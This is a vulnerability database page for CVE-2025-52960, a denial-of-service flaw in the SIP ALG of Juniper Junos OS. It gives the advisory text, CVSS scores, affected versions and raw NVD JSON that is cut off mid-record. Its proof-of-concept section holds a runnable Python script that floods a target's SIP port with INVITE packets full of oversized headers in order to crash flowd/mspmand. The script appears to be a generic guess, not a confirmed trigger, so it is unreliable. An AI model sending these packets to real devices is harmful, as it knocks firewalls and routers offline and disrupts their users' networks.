CVE-2025-52960

Description

A Buffer Copy without Checking Size of Input vulnerability in the Session Initialization Protocol (SIP) ALG of Juniper Networks Junos OS on MX Series and SRX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). When memory utilization is high, and specific SIP packets are received, flowd/mspmand crashes. While the system recovers automatically, the disruption can significantly impact service stability. Continuous receipt of these specific SIP packets, while high utilization is present, will cause a sustained DoS condition. The utilization is outside the attackers control, so they would not be able to deterministically exploit this. This issue affects Junos OS on SRX Series and MX Series: * All versions before 22.4R3-S7, * from 23.2 before 23.2R2-S4, * from 23.4 before 23.4R2-S5, * from 24.2 before 24.2R2.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:mx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2010:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2020:-:*:*:*:*:*:*:* - NOT VULNERABLE

Junos OS < 22.4R3-S7

Junos OS 23.2 (before 23.2R2-S4)

Junos OS 23.4 (before 23.4R2-S5)

Junos OS 24.2 (before 24.2R2)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-52960 PoC - Juniper Junos OS SIP ALG Buffer Overflow DoS # This PoC demonstrates sending crafted SIP packets to trigger flowd/mspmand crash # when target device has high memory utilization import socket import struct import time TARGET_HOST = "192.168.1.1" # Target Juniper SRX/MX device TARGET_PORT = 5060 # Default SIP port def craft_malicious_sip_packet(): """ Craft a SIP INVITE packet with oversized header fields to trigger buffer copy without size check in SIP ALG """ # Create oversized SIP URI to trigger buffer overflow condition oversized_uri = "sip:" + "A" * 4096 + "@target.com" sip_packet = ( f"INVITE {oversized_uri} SIP/2.0\r\n" f"Via: SIP/2.0/UDP attacker.com;branch=z9hG4bK{'B' * 2048}\r\n" f"Max-Forwards: 70\r\n" f"To: <sip:user{'C' * 2048}@target.com>\r\n" f"From: <sip:[email protected]>;tag={'D' * 4096}\r\n" f"Call-ID: {'E' * 8192}@attacker.com\r\n" f"CSeq: 1 INVITE\r\n" f"Contact: <sip:[email protected]>\r\n" f"Content-Length: 0\r\n\r\n" ) return sip_packet.encode() def send_sip_flood(): """ Send crafted SIP packets to trigger the vulnerability Note: Exploitation requires target to have high memory utilization """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}") print("[*] Sending crafted SIP packets...") for i in range(100): try: packet = craft_malicious_sip_packet() sock.sendto(packet, (TARGET_HOST, TARGET_PORT)) print(f"[+] Packet {i+1} sent ({len(packet)} bytes)") time.sleep(0.1) except Exception as e: print(f"[-] Error: {e}") sock.close() print("[*] Attack completed") if __name__ == "__main__": send_sip_flood()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-52960
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-52960
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-52960/
[4] VulDB https://vuldb.com/cve/CVE-2025-52960
[5] https://kb.juniper.net/JSA103143
[6] https://supportportal.juniper.net/JSA103143

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-52960", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:45.033", "lastModified": "2026-01-23T18:34:26.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Buffer Copy without Checking Size of Input vulnerability in the \n\nSession Initialization Protocol (SIP) ALG of Juniper Networks Junos OS on MX Series and SRX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).\n\nWhen memory utilization is high, and specific SIP packets are received, flowd/mspmand crashes. While the system recovers automatically, the disruption can significantly impact service stability. Continuous receipt of these specific SIP packets, while high utilization is present, will cause a sustained DoS condition. The utilization is outside the attackers control, so they would not be able to deterministically exploit this.\nThis issue affects Junos OS on SRX Series and MX Series: \n\n\n * All versions before 22.4R3-S7,\n * from 23.2 before 23.2R2-S4, \n * from 23.4 before 23.4R2-S5, \n * from 24.2 before 24.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870BC30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "40813417-A938-4F74-A419-8C5188A35486"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "7FC1BA1A-DF0E-4B15-86BA-24C60E546732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EBB967BF-3495-476D-839A-9DBFCBE69F91"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3:*:*:*:*:*:*", "matchCriteriaId": "7E5688D6-DCA4-4550-9CD1-A3D792252129"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3-s1:*:*:*:*:*:*", "matchCriteriaId": "8494546C-00EA-49B6-B6FA-FDE42CA5B1FA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r3-s2:*:*:*:*:*:*", "matchCriteriaId": "8BB98579-FA33-4E41-A162-A46E9709FBD3"}, {"vulnerable": true, "criteria": "cpe:2 ... (truncated)